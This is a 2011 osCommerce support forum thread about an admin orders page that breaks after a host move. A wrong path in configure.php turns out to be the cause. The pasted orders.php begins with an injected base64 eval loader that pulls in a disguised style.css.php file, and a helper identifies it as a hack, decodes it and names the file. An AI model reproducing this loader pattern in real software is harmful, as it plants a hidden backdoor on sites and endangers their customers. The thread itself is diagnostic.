Dirk Duckler Posted May 14, 2011 Share Posted May 14, 2011 When I go into admin -> customers -> orders I receive this error: Warning: require_once(/home/content/h/o/u/houseofhid/html/googlecheckout/inserts/admin/orders1.php) [function.require-once]: failed to open stream: No such file or directory in /data/25/2/13/35/2502361/user/2740736/htdocs/admin/orders.php on line 18 Fatal error: require_once() [function.require]: Failed opening required '/home/content/h/o/u/houseofhid/html/googlecheckout/inserts/admin/orders1.php' (include_path='.:/usr/services/vux/lib/php') in /data/25/2/13/35/2502361/user/2740736/htdocs/admin/orders.php on line 18 I'm using the standard checkout method in addition to the googlecheckout add-in. users select their payment method at the checkout page. As far as I can tell, all the required files are there. And I've never had any issues like this until I switched hosts. Can anyone shed some light on this for me? Link to comment Share on other sites More sharing options...
Guest Posted May 14, 2011 Share Posted May 14, 2011 Orders1.php is not a valid filename. It is more than likely a backup, but you will have to remove it from the directory to remove the errors. Chris Link to comment Share on other sites More sharing options...
germ Posted May 15, 2011 Share Posted May 15, 2011 The server is telling you that the file someone else just told you to remove isn't there in the first place. Not sure I understand that logic... Maybe I misunderstand the advice. :blush: Anyhow I found your site and your admin leaks like a sieve. :o It's a miracle you haven't been hacked to pieces by now. Visit the link below: How to Secure Your Site Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Dirk Duckler Posted May 16, 2011 Author Share Posted May 16, 2011 OK so while I work on securing the admin (yes it's been backed before) what can I do to get rid of the error and restore my ability to view customers' orders? Link to comment Share on other sites More sharing options...
germ Posted May 16, 2011 Share Posted May 16, 2011 Restore the missing file: /googlecheckout/inserts/admin/orders1.php If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Dirk Duckler Posted May 17, 2011 Author Share Posted May 17, 2011 It's still there, never has not been there. Inside that directory are modules.php, modules2.php, orders1.php, orders2.php, and orders3.php Link to comment Share on other sites More sharing options...
germ Posted May 17, 2011 Share Posted May 17, 2011 If the file is there the path must be wrong. Look at the different paths: Warning: require_once(/home/content/h/o/u/houseofhid/html/googlecheckout/inserts/admin/orders1.php) [function.require-once]: failed to open stream: No such file or directory in /data/25/2/13/35/2502361/user/2740736/htdocs/admin/orders.php on line 18 Both of those can't be correct. One of those is most likely the path on the old server, the other is the path on the new server. I'm guessing there is a path in a config file or "hard coded" in a file you need to change. I don't know anything about the contribution at all. I can only make assumptions from observations on what you've posted. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Dirk Duckler Posted May 17, 2011 Author Share Posted May 17, 2011 If the file is there the path must be wrong. Look at the different paths: Both of those can't be correct. One of those is most likely the path on the old server, the other is the path on the new server. I'm guessing there is a path in a config file or "hard coded" in a file you need to change. I don't know anything about the contribution at all. I can only make assumptions from observations on what you've posted. Would it help if I posted my config file, minus the sensitive db info? Link to comment Share on other sites More sharing options...
germ Posted May 17, 2011 Share Posted May 17, 2011 in /data/25/2/13/35/2502361/user/2740736/htdocs/admin/orders.php on line 18 Assuming that's the correct path, post the first 25 or so lines of in admin/orders.php If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Dirk Duckler Posted May 18, 2011 Author Share Posted May 18, 2011 Assuming that's the correct path, post the first 25 or so lines of in admin/orders.php <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2NvbnRlbnQvaC9vL3UvaG91c2VvZmhpZC9odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?> <?php /* $Id: orders.php 1739 2007-12-20 00:52:16Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ require('includes/application_top.php'); require(DIR_WS_CLASSES . 'currencies.php'); // *** BEGIN GOOGLE CHECKOUT *** require_once(DIR_FS_CATALOG . 'googlecheckout/inserts/admin/orders1.php'); // *** END GOOGLE CHECKOUT *** $currencies = new currencies(); $orders_statuses = array(); $orders_status_array = array(); $orders_status_query = tep_db_query("select orders_status_id, orders_status_name from " . TABLE_ORDERS_STATUS . " where language_id = '" . (int)$languages_id . "'"); while ($orders_status = tep_db_fetch_array($orders_status_query)) { $orders_statuses[] = array('id' => $orders_status['orders_status_id'], 'text' => $orders_status['orders_status_name']); $orders_status_array[$orders_status['orders_status_id']] = $orders_status['orders_status_name']; } $action = (isset($HTTP_GET_VARS['action']) ? $HTTP_GET_VARS['action'] : ''); if (tep_not_null($action)) { switch ($action) { case 'update_order': $oID = tep_db_prepare_input($HTTP_GET_VARS['oID']); $status = tep_db_prepare_input($HTTP_POST_VARS['status']); $comments = tep_db_prepare_input($HTTP_POST_VARS['comments']); $order_updated = false; $check_status_query = tep_db_query("select customers_name, customers_email_address, orders_status, date_purchased from " . TABLE_ORDERS . " where orders_id = '" . (int)$oID . "'"); $check_status = tep_db_fetch_array($check_status_query); if ( ($check_status['orders_status'] != $status) || tep_not_null($comments)) { tep_db_query("update " . TABLE_ORDERS . " set orders_status = '" . tep_db_input($status) . "', last_modified = now() where orders_id = '" . (int)$oID . "'"); // *** BEGIN GOOGLE CHECKOUT *** require_once(DIR_FS_CATALOG . 'googlecheckout/inserts/admin/orders2.php'); // *** END GOOGLE CHECKOUT *** tep_db_query("insert into " . TABLE_ORDERS_STATUS_HISTORY . " (orders_id, orders_status_id, date_added, customer_notified, comments) values ('" . (int)$oID . "', '" . tep_db_input($status) . "', now(), '" . tep_db_input($customer_notified) . "', '" . tep_db_input($comments) . "')"); $order_updated = true; } if ($order_updated == true) { $messageStack->add_session(SUCCESS_ORDER_UPDATED, 'success'); } else { $messageStack->add_session(WARNING_ORDER_NOT_UPDATED, 'warning'); } tep_redirect(tep_href_link(FILENAME_ORDERS, tep_get_all_get_params(array('action')) . 'action=edit')); break; case 'deleteconfirm': $oID = tep_db_prepare_input($HTTP_GET_VARS['oID']); tep_remove_order($oID, $HTTP_POST_VARS['restock']); tep_redirect(tep_href_link(FILENAME_ORDERS, tep_get_all_get_params(array('oID', 'action')))); break; } } if (($action == 'edit') && isset($HTTP_GET_VARS['oID'])) { $oID = tep_db_prepare_input($HTTP_GET_VARS['oID']); $orders_query = tep_db_query("select orders_id from " . TABLE_ORDERS . " where orders_id = '" . (int)$oID . "'"); $order_exists = true; if (!tep_db_num_rows($orders_query)) { $order_exists = false; $messageStack->add(sprintf(ERROR_ORDER_DOES_NOT_EXIST, $oID), 'error'); } } include(DIR_WS_CLASSES . 'order.php'); ?> <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html <?php echo HTML_PARAMS; ?>> <head> <meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET; ?>"> <title><?php echo TITLE; ?></title> <link rel="stylesheet" type="text/css" href="includes/stylesheet.css"> <script language="javascript" src="includes/general.js"></script> </head> <body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF"> <!-- header //--> <?php require(DIR_WS_INCLUDES . 'header.php'); ?> <!-- header_eof //--> Link to comment Share on other sites More sharing options...
Dirk Duckler Posted May 18, 2011 Author Share Posted May 18, 2011 I feel like an idiot. The configure.php file inside admin/includes still had the incorrect path from the previous server, and with that changed it's working perfectly now. Thanks for your help gem. Link to comment Share on other sites More sharing options...
germ Posted May 18, 2011 Share Posted May 18, 2011 Don't look know, but the presence of this code means you're hacked: <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2NvbnRlbnQvaC9vL3UvaG91c2VvZmhpZC9odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?> :'( If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
germ Posted May 18, 2011 Share Posted May 18, 2011 Hack code decoded: if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){ $GLOBALS['mfsn']='/home/content/h/o/u/houseofhid/html/admin/includes/languages/english/images/buttons/style.css.php'; if(file_exists($GLOBALS['mfsn'])){ include_once($GLOBALS['mfsn']); if(function_exists('gml')&&function_exists('dgobh')){ ob_start('dgobh'); } } } Gives at least one hack file to look for: /admin/includes/languages/english/images/buttons/style.css.php If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.